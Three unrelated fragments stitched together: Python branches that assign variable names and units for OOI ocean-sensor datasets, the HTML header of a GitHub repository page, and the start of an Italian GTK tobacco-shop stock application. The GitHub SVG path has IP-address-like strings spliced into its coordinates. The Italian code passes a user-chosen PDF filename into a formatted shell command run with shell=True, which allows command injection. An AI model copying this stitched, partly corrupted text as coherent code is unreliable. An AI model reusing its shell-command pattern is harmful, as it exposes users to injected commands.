var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
elif platform_name == 'CE06ISSM' and node == 'NSIF' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE06ISSM/RID16/02-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
elif platform_name == 'CE06ISSM' and node == 'BUOY' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE06ISSM/SBD17/06-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
elif platform_name == 'CE02SHSM' and node == 'NSIF' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE02SHSM/RID27/02-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
| |
<reponame>SpartanByte/nuwebsite2
<!DOCTYPE html>
<html lang="en" class="">
<head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# object: http://ogp.me/ns/object# article: http://ogp.me/ns/article# profile: http://ogp.me/ns/profile#">
<meta charset='utf-8'>
<link crossorigin="anonymous" href="https://assets-cdn.github.com/assets/frameworks-298818692f75de57d67115ca5a0c1f983d1d5ad302774216c297495f46f0a3da.css" integrity="sha256-KYgYaS913lfWcRXKWgwfmD0dWtMCd0IWwpdJX0bwo9o=" media="all" rel="stylesheet" />
<link crossorigin="anonymous" href="https://assets-cdn.github.com/assets/github-af26325cd1f74a051b780b08b16d1d6e14e783fc9ffc1dc07cf88b2962698d1e.css" integrity="sha256-ryYyXNH3SgUbeAsIsW0dbhTng/yf/B3AfPiLKWJpjR4=" media="all" rel="stylesheet" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Language" content="en">
<meta name="viewport" content="width=device-width">
<title>Python_CalculationsExample/Python-CalculationsExample.py at master · SpartanByte/Python_CalculationsExample</title>
<link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub">
<link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub">
<link rel="apple-touch-icon" href="/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="57x57" href="/apple-touch-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/apple-touch-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/apple-touch-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/apple-touch-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/apple-touch-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/apple-touch-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon-180x180.png">
<meta property="fb:app_id" content="1401488693436528">
<meta content="https://avatars2.githubusercontent.com/u/15736213?v=3&s=400" name="twitter:image:src" /><meta content="@github" name="twitter:site" /><meta content="summary" name="twitter:card" /><meta content="SpartanByte/Python_CalculationsExample" name="twitter:title" /><meta content="Python_CalculationsExample - Python Example: Automotive calculations processed from user input." name="twitter:description" />
<meta content="https://avatars2.githubusercontent.com/u/15736213?v=3&s=400" property="og:image" /><meta content="GitHub" property="og:site_name" /><meta content="object" property="og:type" /><meta content="SpartanByte/Python_CalculationsExample" property="og:title" /><meta content="https://github.com/SpartanByte/Python_CalculationsExample" property="og:url" /><meta content="Python_CalculationsExample - Python Example: Automotive calculations processed from user input." property="og:description" />
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<link rel="assets" href="https://assets-cdn.github.com/">
<link rel="web-socket" href="wss://live.github.com/_sockets/VjI6MTUwMTI1MjQ3OjQ5Y2EzOWI4YzBmNWU4OTJiZWI2NDM5NGNmOTY3Mjg1N2M0N2JjYTY5MDAwZmM0MjY4YWRmOTk3MmQ0ZTYyNzc=--b498224fa0d624081c09efe2db41a67d3857a445">
<meta name="pjax-timeout" content="1000">
<link rel="sudo-modal" href="/sessions/sudo_modal">
<meta name="request-id" content="97D9:5F80:BF0EE1:136989F:588B94F5" data-pjax-transient>
<meta name="msapplication-TileImage" content="/windows-tile.png">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="<KEY>">
<meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA">
<meta name="google-analytics" content="UA-3769691-2">
<meta content="collector.githubapp.com" name="octolytics-host" /><meta content="github" name="octolytics-app-id" /><meta content="97D9:5F80:BF0EE1:136989F:588B94F5" name="octolytics-dimension-request_id" /><meta content="15736213" name="octolytics-actor-id" /><meta content="SpartanByte" name="octolytics-actor-login" /><meta content="ae6633e33639693590a78449a9f0c4889d88c0de292624b8ebd4a1a60fe5e914" name="octolytics-actor-hash" />
<meta content="/<user-name>/<repo-name>/blob/show" data-pjax-transient="true" name="analytics-location" />
<meta class="js-ga-set" name="dimension1" content="Logged In">
<meta name="hostname" content="github.com">
<meta name="user-login" content="SpartanByte">
<meta name="expected-hostname" content="github.com">
<meta name="js-proxy-site-detection-payload" content="<KEY>>
<link rel="mask-icon" href="https://assets-cdn.github.com/pinned-octocat.svg" color="#000000">
<link rel="icon" type="image/x-icon" href="https://assets-cdn.github.com/favicon.ico">
<meta name="html-safe-nonce" content="9facf21d2a81791ae97d3e46d8df245400185a2a">
<meta http-equiv="x-pjax-version" content="ef4a7b91595077e0cea4dfe480800686">
<meta name="description" content="Python_CalculationsExample - Python Example: Automotive calculations processed from user input.">
<meta name="go-import" content="github.com/SpartanByte/Python_CalculationsExample git https://github.com/SpartanByte/Python_CalculationsExample.git">
<meta content="15736213" name="octolytics-dimension-user_id" /><meta content="SpartanByte" name="octolytics-dimension-user_login" /><meta content="54163664" name="octolytics-dimension-repository_id" /><meta content="SpartanByte/Python_CalculationsExample" name="octolytics-dimension-repository_nwo" /><meta content="true" name="octolytics-dimension-repository_public" /><meta content="false" name="octolytics-dimension-repository_is_fork" /><meta content="54163664" name="octolytics-dimension-repository_network_root_id" /><meta content="SpartanByte/Python_CalculationsExample" name="octolytics-dimension-repository_network_root_nwo" />
<link href="https://github.com/SpartanByte/Python_CalculationsExample/commits/master.atom" rel="alternate" title="Recent Commits to Python_CalculationsExample:master" type="application/atom+xml">
<link rel="canonical" href="https://github.com/SpartanByte/Python_CalculationsExample/blob/master/Python-CalculationsExample.py" data-pjax-transient>
</head>
<body class="logged-in env-production windows vis-public page-blob">
<div id="js-pjax-loader-bar" class="pjax-loader-bar"><div class="progress"></div></div>
<a href="#start-of-content" tabindex="1" class="accessibility-aid js-skip-to-content">Skip to content</a>
<div class="header header-logged-in true" role="banner">
<div class="container clearfix">
<a class="header-logo-invertocat" href="https://github.com/" data-hotkey="g d" aria-label="Homepage" data-ga-click="Header, go to dashboard, icon:logo">
<svg aria-hidden="true" class="octicon octicon-mark-github" height="28" version="1.1" viewBox="0 0 16 16" width="28"><path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 192.168.127.12 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 172.16.17.32.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z"/></svg>
</a>
<div class="header-search scoped-search site-scoped-search js-site-search" role="search">
<!-- '"` --><!-- </textarea></xmp> --></option></form><form accept-charset="UTF-8" action="/SpartanByte/Python_CalculationsExample/search" class="js-site-search-form" data-scoped-search-url="/SpartanByte/Python_CalculationsExample/search" data-unscoped-search-url="/search" method="get"><div style="margin:0;padding:0;display:inline"><input name="utf8" type="hidden" value="✓" /></div>
<label class="form-control header-search-wrapper js-chromeless-input-container">
<div class="header-search-scope">This repository</div>
<input type="text"
class="form-control header-search-input js-site-search-focus js-site-search-field is-clearable"
data-hotkey="s"
name="q"
placeholder="Search"
aria-label="Search this repository"
data-unscoped-placeholder="Search GitHub"
data-scoped-placeholder="Search"
autocapitalize="off">
</label>
</form></div>
<ul class="header-nav float-left" role="navigation">
<li class="header-nav-item">
<a href="/pulls" aria-label="Pull requests you created" class="js-selected-navigation-item header-nav-link" data-ga-click="Header, click, Nav menu - item:pulls context:user" data-hotkey="g p" data-selected-links="/pulls /pulls/assigned /pulls/mentioned /pulls">
Pull requests
</a> </li>
<li class="header-nav-item">
<a href="/issues" aria-label="Issues you created" class="js-selected-navigation-item header-nav-link" data-ga-click="Header, click, Nav menu - item:issues context:user" data-hotkey="g i" data-selected-links="/issues /issues/assigned /issues/mentioned /issues">
Issues
</a> </li>
<li class="header-nav-item">
<a class="header-nav-link" href="https://gist.github.com/" data-ga-click="Header, go to gist, text:gist">Gist</a>
</li>
</ul>
<ul class="header-nav user-nav float-right" id="user-links">
<li class="header-nav-item">
<a href="/notifications" aria-label="You have unread notifications" class="header-nav-link notification-indicator tooltipped tooltipped-s js-socket-channel js-notification-indicator" data-channel="tenant:1:notification-changed:15736213" data-ga-click="Header, go to notifications, icon:unread" data-hotkey="g n">
<span class="mail-status unread"></span>
<svg aria-hidden="true" class="octicon octicon-bell" height="16" version="1.1" viewBox="0 0 14 16" width="14"><path fill-rule="evenodd" d="M14 12v1H0v-1l.73-.58c.77-.77.81-2.55 1.19-4.42C2.69 3.23 6 2 6 2c0-.55.45-1 1-1s1 .45 1 1c0 0 3.39 1.23 4.16 5 .38 1.88.42 3.66 1.19 4.42l.66.58H14zm-7 4c1.11 0 2-.89 2-2H5c0 1.11.89 2 2 2z"/></svg>
</a>
</li>
<li class="header-nav-item dropdown js-menu-container">
<a class="header-nav-link tooltipped tooltipped-s js-menu-target" href="/new"
aria-label="Create new…"
data-ga-click="Header, create new, icon:add">
<svg aria-hidden="true" class="octicon octicon-plus float-left" height="16" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M12 9H7v5H5V9H0V7h5V2h2v5h5z"/></svg>
<span class="dropdown-caret"></span>
</a>
<div class="dropdown-menu-content js-menu-content">
<ul class="dropdown-menu dropdown-menu-sw">
<a class="dropdown-item" href="/new" data-ga-click="Header, create new repository">
New repository
</a>
<a class="dropdown-item" href="/new/import" data-ga-click="Header, import a repository">
Import repository
</a>
<a class="dropdown-item" href="https://gist.github.com/" data-ga-click="Header, create new gist">
New gist
</a>
<a class="dropdown-item" href="/organizations/new" data-ga-click="Header, create new organization">
New organization
</a>
<div class="dropdown-divider"></div>
<div class="dropdown-header">
<span title="SpartanByte/Python_CalculationsExample">This repository</span>
</div>
<a class="dropdown-item" href="/SpartanByte/Python_CalculationsExample/issues/new" data-ga-click="Header, create new issue">
New issue
</a>
<a class="dropdown-item" href="/SpartanByte/Python_CalculationsExample/settings/collaboration" data-ga-click="Header, create new collaborator">
New collaborator
</a>
</ul>
</div>
</li>
<li class="header-nav-item dropdown js-menu-container">
<a class="header-nav-link name tooltipped tooltipped-sw js-menu-target" href="/SpartanByte"
aria-label="View profile and more"
data-ga-click="Header, show menu, icon:avatar">
<img alt="@SpartanByte" class="avatar" height="20" src="https://avatars3.githubusercontent.com/u/15736213?v=3&s=40" width="20" />
<span class="dropdown-caret"></span>
</a>
<div class="dropdown-menu-content js-menu-content">
<div class="dropdown-menu dropdown-menu-sw">
<div class="dropdown-header header-nav-current-user css-truncate">
Signed in as <strong class="css-truncate-target">SpartanByte</strong>
</div>
<div class="dropdown-divider"></div>
<a class="dropdown-item" href="/SpartanByte" data-ga-click="Header, go to profile, text:your profile">
Your profile
</a>
<a class="dropdown-item" href="/SpartanByte?tab=stars" data-ga-click="Header, go to starred repos, text:your stars">
Your stars
</a>
<a class="dropdown-item" href="/explore" data-ga-click="Header, go to explore, text:explore">
Explore
</a>
<a class="dropdown-item" href="/integrations" data-ga-click="Header, go to integrations, text:integrations">
Integrations
</a>
<a class="dropdown-item" href="https://help.github.com" data-ga-click="Header, go to help, text:help">
Help
</a>
<div class="dropdown-divider"></div>
<a class="dropdown-item" href="/settings/profile" data-ga-click="Header, go to settings, icon:settings">
Settings
</a>
<!-- '"` --><!-- </textarea></xmp> --></option></form><form accept-charset="UTF-8" action="/logout" class="logout-form" method="post"><div style="margin:0;padding:0;display:inline"><input name="utf8" type="hidden" value="✓" /><input name="authenticity_token" type="hidden" value="<KEY> /></div>
<button type="submit" class="dropdown-item dropdown-signout" data-ga-click="Header, sign out, icon:logout">
Sign out
</button>
</form> </div>
</div>
</li>
</ul>
</div>
</div>
<div id="start-of-content" class="accessibility-aid"></div>
<div id="js-flash-container">
</div>
<div role="main">
<div itemscope itemtype="http://schema.org/SoftwareSourceCode">
<div id="js-repo-pjax-container" data-pjax-container>
<div class="pagehead repohead instapaper_ignore readability-menu experiment-repo-nav">
<div class="container repohead-details-container">
<ul class="pagehead-actions">
<li>
<!-- '"` --><!-- </textarea></xmp> --></option></form><form accept-charset="UTF-8" action="/notifications/subscribe" class="js-social-container" data-autosubmit="true" data-remote="true" method="post"><div style="margin:0;padding:0;display:inline"><input name="utf8" type="hidden" value="✓" /><input name="authenticity_token" type="hidden" value="<KEY> /></div> <input class="form-control" id="repository_id" name="repository_id" type="hidden" value="54163664" />
<div class="select-menu js-menu-container js-select-menu">
<a href="/SpartanByte/Python_CalculationsExample/subscription"
class="btn btn-sm btn-with-count select-menu-button js-menu-target" role="button" tabindex="0" aria-haspopup="true"
data-ga-click="Repository, click Watch settings, action:blob#show">
<span class="js-select-button">
<svg aria-hidden="true" class="octicon octicon-eye" height="16" version="1.1" viewBox="0 0 16 16" width="16"><path fill-rule="evenodd" d="M8.06 2C3 2 0 8 0 8s3 6 8.06 6C13 14 16 8 16 8s-3-6-7.94-6zM8 12c-2.2 0-4-1.78-4-4 0-2.2 1.8-4 4-4 2.22 0 4 1.8 4 4 0 2.22-1.78 4-4 4zm2-4c0 1.11-.89 2-2 2-1.11 0-2-.89-2-2 0-1.11.89-2 2-2 1.11 0 2 .89 2 2z"/></svg>
Unwatch
</span>
</a>
<a class="social-count js-social-count"
href="/SpartanByte/Python_CalculationsExample/watchers"
aria-label="1 user is watching this repository">
1
</a>
<div class="select-menu-modal-holder">
<div class="select-menu-modal subscription-menu-modal js-menu-content" aria-hidden="true">
<div class="select-menu-header js-navigation-enable" tabindex="-1">
<svg aria-label="Close" class="octicon octicon-x js-menu-close" height="16" role="img" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M7.48 8l3.75 3.75-1.48 1.48L6 9.48l-3.75 3.75-1.48-1.48L4.52 8 .77 4.25l1.48-1.48L6 6.52l3.75-3.75 1.48 1.48z"/></svg>
<span class="select-menu-title">Notifications</span>
</div>
<div class="select-menu-list js-navigation-container" role="menu">
<div class="select-menu-item js-navigation-item " role="menuitem" tabindex="0">
<svg aria-hidden="true" class="octicon octicon-check select-menu-item-icon" height="16" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M12 5l-8 8-4-4 1.5-1.5L4 10l6.5-6.5z"/></svg>
<div class="select-menu-item-text">
<input id="do_included" name="do" type="radio" value="included" />
<span class="select-menu-item-heading">Not watching</span>
<span class="description">Be notified when participating or @mentioned.</span>
<span class="js-select-button-text hidden-select-button-text">
<svg aria-hidden="true" class="octicon octicon-eye" height="16" version="1.1" viewBox="0 0 16 16" width="16"><path fill-rule="evenodd" d="M8.06 2C3 2 0 8 0 8s3 6 8.06 6C13 14 16 8 16 8s-3-6-7.94-6zM8 12c-2.2 0-4-1.78-4-4 0-2.2 1.8-4 4-4 2.22 0 4 1.8 4 4 0 2.22-1.78 4-4 4zm2-4c0 1.11-.89 2-2 2-1.11 0-2-.89-2-2 0-1.11.89-2 2-2 1.11 0 2 .89 2 2z"/></svg>
Watch
</span>
</div>
</div>
<div class="select-menu-item js-navigation-item selected" role="menuitem" tabindex="0">
<svg aria-hidden="true" class="octicon octicon-check select-menu-item-icon" height="16" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M12 5l-8 8-4-4 1.5-1.5L4 10l6.5-6.5z"/></svg>
<div class="select-menu-item-text">
<input checked="checked" id="do_subscribed" name="do" type="radio" value="subscribed" />
<span class="select-menu-item-heading">Watching</span>
<span class="description">Be notified of all conversations.</span>
<span class="js-select-button-text hidden-select-button-text">
<svg aria-hidden="true" class="octicon octicon-eye" height="16" version="1.1" viewBox="0 0 16 16" width="16"><path fill-rule="evenodd" d="M8.06 2C3 2 0 8 0 8s3 6 8.06 6C13 14 16 8 16 8s-3-6-7.94-6zM8 12c-2.2 0-4-1.78-4-4 0-2.2 1.8-4 4-4 2.22 0 4 1.8 4 4 0 2.22-1.78 4-4 4zm2-4c0 1.11-.89 2-2 2-1.11 0-2-.89-2-2 0-1.11.89-2 2-2 1.11 0 2 .89 2 2z"/></svg>
Unwatch
</span>
</div>
</div>
<div class="select-menu-item js-navigation-item " role="menuitem" tabindex="0">
<svg aria-hidden="true" class="octicon octicon-check select-menu-item-icon" height="16" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M12 5l-8 8-4-4 1.5-1.5L4 10l6.5-6.5z"/></svg>
<div class="select-menu-item-text">
<input id="do_ignore" name="do" type="radio" value="ignore" />
<span class="select-menu-item-heading">Ignoring</span>
<span class="description">Never be notified.</span>
| |
#!/usr/bin/env python
#
# Copyright (C) <NAME> 2020 <<EMAIL>>
#
import datetime
import os
import re
import sqlite3
import subprocess
import sys
import tempfile
import xlrd
import xlwt
import base64
import locale
import gi
from . import browserWebkit2
from .browserWebkit2 import Browser
from . import config
from .config import log
from . import ordini
from . import preferencesTabacchi
from .preferencesTabacchi import prefs
from . import stampe
from . import stats
from . import utility
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, Gio, GLib, GdkPixbuf, Pango # noqa: E402
MENU_XML = """
<?xml version="1.0" encoding="UTF-8"?>
<interface>
<menu id="app-menu">
<submenu>
<attribute name="label">Tabacchi</attribute>
<section>
<item>
<attribute name="label">Importa documenti Logista...</attribute>
<attribute name="action">app.importa</attribute>
</item>
<item>
<attribute name="label">Ricalcola consumi...</attribute>
<attribute name="action">app.ricalcola</attribute>
</item>
<item>
<attribute name="label">Statistiche...</attribute>
<attribute name="action">app.statistiche</attribute>
</item>
</section>
</submenu>
<submenu>
<attribute name="label">Excel</attribute>
<section>
<item>
<attribute name="label">Genera inventario...</attribute>
<attribute name="action">app.excel</attribute>
</item>
<item>
<attribute name="label">Genera modello ordine...</attribute>
<attribute name="action">app.ordine_excel</attribute>
</item>
</section>
</submenu>
<submenu>
<attribute name="label">Stampe</attribute>
<section>
<item>
<attribute name="label">Etichette prezzi...</attribute>
<attribute name="action">app.etichette</attribute>
</item>
<item>
<attribute name="label">Elenco articoli...</attribute>
<attribute name="action">app.articoli</attribute>
</item>
</section>
</submenu>
<section>
<item>
<attribute name="action">app.preferences</attribute>
<attribute name="label" translatable="yes">_Preferences...</attribute>
</item>
<item>
<attribute name="action">app.about</attribute>
<attribute name="label" translatable="yes">_About</attribute>
</item>
<item>
<attribute name="action">app.quit</attribute>
<attribute name="label" translatable="yes">_Quit</attribute>
<attribute name="accel"><Primary>q</attribute>
</item>
</section>
</menu>
</interface>
"""
# Dialog per importare ordini o fatture dal sito Logista
class ImportDialog(utility.GladeWindow):
ID_CODICE, ID_DESC, ID_PESO, ID_COSTO, ID_PREZZO_KG = (0, 1, 2, 3, 4)
POS_CODICE, POS_DESC, POS_PESO, POS_COSTO = (1, 2, 3, 5)
UNKNOWN, FATTURA, ORDINE = (-1, 1, 2)
TIPO_DOC = {FATTURA: "Fattura", ORDINE: "Ordine"}
modelInfoList = [
("Codice", "str", ID_CODICE),
("!+Descrizione", "str", ID_DESC),
("Peso", "float", ID_PESO),
("Costo", "currency", ID_COSTO),
(None, "currency", ID_PREZZO_KG)]
def __init__(self, parent):
super().__init__(parent, "importDialog.glade")
self.importDialog = self.builder.get_object("importDialog")
self.importDialog.set_transient_for(parent)
self.importTreeview = self.builder.get_object("importTreeview")
self.dataLabel = self.builder.get_object("dataLabel")
self.fileChooser = self.builder.get_object("fileChooserButton")
self.tipoDocLabel = self.builder.get_object("tipoDocLabel")
self.totaleKgLabel = self.builder.get_object("totaleKgLabel")
self.totaleEuroLabel = self.builder.get_object("totaleEuroLabel")
listino_formats = {self.ID_PESO: "%.3f kg"}
listino_properties = {self.ID_CODICE: {"xalign": 1, "scale": utility.PANGO_SCALE_SMALL},
self.ID_COSTO: {"xalign": 1, "scale": utility.PANGO_SCALE_SMALL}}
utility.ExtTreeView(self.modelInfoList, self.importTreeview, formats=listino_formats, properties=listino_properties)
self.importModel = self.importTreeview.get_model()
fileFilter = Gtk.FileFilter()
fileFilter.set_name("Pdf files")
fileFilter.add_pattern("*.pdf")
self.fileChooser.add_filter(fileFilter)
self.builder.connect_signals({"on_importDialog_delete_event": self.close,
"on_okButton_clicked": self.okClose,
"on_cancelButton_clicked": self.close,
"on_fileChooserButton_file_set": self.importDoc
})
self.dataOrdine = None
self.dataFattura = None
self.totalKg = 0
self.totalEuro = 0
self.result = None
self.tipo = self.UNKNOWN
self.tabacchiDict = self.__getTabacchiDict()
self.dataOrdineEntry = utility.DataEntry(self.builder.get_object("dataOrdineButton"), None, " %d %B %Y ")
# Genera un dizionario con l'attuale listino tabacchi
def __getTabacchiDict(self):
conn = None
cursor = None
tabacchiDict = None
try:
conn = prefs.getConn()
cursor = prefs.getCursor(conn)
cursor.execute("SELECT ID, Descrizione, PrezzoKg FROM tabacchi")
resultset = cursor.fetchall()
tabacchiDict = dict()
for row in resultset:
tabacchiDict[row["ID"]] = [row["Descrizione"], row["PrezzoKg"]]
except sqlite3.Error as e:
utility.gtkErrorMsg(e, self.importDialog)
finally:
if cursor:
cursor.close()
if conn:
conn.close()
return tabacchiDict
# Importa un documento Logista
def importDoc(self, widget):
(self.dataFattura, self.tipo, self.totalEuro, self.totalKg) = self.__importDoc(self.importModel, self.tabacchiDict)
self.totaleEuroLabel.set_text(locale.currency(self.totalEuro, True, True))
self.totaleKgLabel.set_text(locale.format_string("%.3f", self.totalKg))
if self.dataFattura:
self.dataLabel.set_text(self.dataFattura.strftime("%A %d %B %Y"))
self.dataOrdine = self.dataFattura - datetime.timedelta(days=prefs.ggPerOrdine)
self.dataOrdineEntry.setDate(self.dataOrdine)
else:
self.dataLabel.set_text("")
if self.tipo == self.UNKNOWN:
self.tipoDocLabel.set_text("")
else:
self.tipoDocLabel.set_text(self.TIPO_DOC[self.tipo])
# Importa un documento Logista (fattura o ordine) nel modello passato per parametro, usando un dizionario per riconoscere i codici articolo
def __importDoc(self, model, tabacchiDict):
data = None
tipo = self.UNKNOWN
totalKg = 0
totalEuro = 0
filename = self.fileChooser.get_filename()
if not filename:
msgDialog = Gtk.MessageDialog(parent=self.importDialog, modal=True, message_type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.CLOSE, text="Importazione non avvenuta.")
msgDialog.format_secondary_text("Seleziona un documento pdf.")
msgDialog.set_title("Attenzione")
msgDialog.run()
msgDialog.destroy()
else:
model.clear()
row = [None] * model.get_n_columns()
tmpFile = tempfile.NamedTemporaryFile(delete=False)
tmpFile.close()
command = "pdftotext -layout %s %s" % (filename, tmpFile.name)
try:
subprocess.check_call(command, shell=True)
except Exception as e:
utility.gtkErrorMsg(e, self.importDialog)
return
# Check per stabilire se il documento è una fattura o un ordine Logista
fatturaPattern = re.compile(r".*- FATTURA U13 -.*")
ordinePattern = re.compile(r".*Numero ordine\s+\d+.*")
with open(tmpFile.name, 'r') as f:
for line in f:
if fatturaPattern.match(line):
tipo = self.FATTURA
break
elif ordinePattern.match(line):
tipo = self.ORDINE
break
if tipo != self.UNKNOWN:
if tipo == self.FATTURA:
headerPattern = re.compile(r"\s*CODICE\s+DESCRIZIONE\s+\S+\s+PREZZO\s+IMPORTO LORDO\s*")
datePattern = re.compile(r".*\s+(\d\d\.\d\d\.\d\d\d\d)\s*")
rowPattern = re.compile(r"^\s*1000*(\d+)\d{3}\s+(.*)\s+(\d+,\d+)\s+(\d+,\d+)\s+([0-9\.\,]+)\s*$")
ignorePattern = re.compile(r"\s*===\s+.*")
if tipo == self.ORDINE:
headerPattern = re.compile(r"\s*Riga\s+Cod\.AAMS\s+Descrizione\s+Quantità\s*")
datePattern = re.compile(r".*\s+(\d\d\.\d\d\.\d\d\d\d)\s*")
rowPattern = re.compile(r"\s*\d+\s+(\d+)\s+(.*)\s+(\d+,\d+)\s*")
ignorePattern = re.compile(r"\s*===\s+.*")
body = False
with open(tmpFile.name, 'r') as f:
for line in f:
# Se non siamo nel corpo
if not body:
m = headerPattern.match(line)
# Se trovo la testata, allora inizia il corpo
if m:
body = True
elif not data:
m = datePattern.match(line)
if m:
data = datetime.datetime.strptime(m.group(1), "%d.%m.%Y")
# Se siamo nel corpo
else:
m = rowPattern.match(line)
# E' una riga standard
if m:
idCod = m.group(1).strip()
peso = locale.atof(m.group(3))
costo = 0
prezzo_kg = 0
row[self.ID_CODICE] = idCod
row[self.ID_PESO] = peso
row[self.ID_DESC] = m.group(2).strip()
if tipo == self.FATTURA:
costo = locale.atof(m.group(5))
prezzo_kg = costo / peso
if idCod in tabacchiDict:
# row[self.ID_DESC] = tabacchiDict[idCod][0]
if tipo == self.ORDINE:
prezzo_kg = tabacchiDict[idCod][1]
costo = prezzo_kg * peso
row[self.ID_COSTO] = costo
row[self.ID_PREZZO_KG] = round(prezzo_kg, 3)
totalEuro += costo
totalKg += peso
model.append(row)
# Se non è una riga standard e non è una riga da ignorare, allora è finito il corpo
elif not ignorePattern.match(line):
body = False
if not data or not model.get_iter_first():
data = None
model.clear()
msgDialog = Gtk.MessageDialog(parent=self.importDialog, modal=True, message_type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.CLOSE, text="Importazione non avvenuta.")
msgDialog.format_secondary_text("Il documento pdf è un documento Logista?")
msgDialog.set_title("Attenzione")
msgDialog.run()
msgDialog.destroy()
return data, tipo, totalEuro, totalKg
def run(self):
self.importDialog.run()
return self.result
def okClose(self, widget):
if not self.importModel.get_iter_first():
msgDialog = Gtk.MessageDialog(parent=self.importDialog, modal=True, message_type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.OK, text="Non è stato importato alcun ordine.")
msgDialog.set_title("Attenzione")
msgDialog.run()
msgDialog.destroy()
else:
self.result = [self.dataFattura, self.importModel, self.tipo, self.dataOrdine]
self.importDialog.destroy()
def close(self, widget, other=None):
self.importDialog.destroy()
# Dialog per scegliere il tipo di Ordine
class U88Dialog(utility.GladeWindow):
def __init__(self, parent, data):
super().__init__(parent, "u88Dialog.glade")
self.u88Dialog = self.builder.get_object("u88Dialog")
self.u88Dialog.set_transient_for(parent)
self.straordinario = self.builder.get_object("straordinario_radiobutton")
self.urgente = self.builder.get_object("urgente_radiobutton")
self.dataEntry = utility.DataEntry(self.builder.get_object("dataButton"), data, " %d %B %Y ")
self.result = None
self.builder.connect_signals({"on_u88Dialog_delete_event": self.close,
"on_okButton_clicked": self.okClose,
"on_cancelButton_clicked": self.close
})
def run(self):
self.u88Dialog.run()
return self.result
def okClose(self, widget):
tipo = ordini.ORDINARIO
if self.straordinario.get_active():
tipo = ordini.STRAORDINARIO
elif self.urgente.get_active():
tipo = ordini.URGENTE
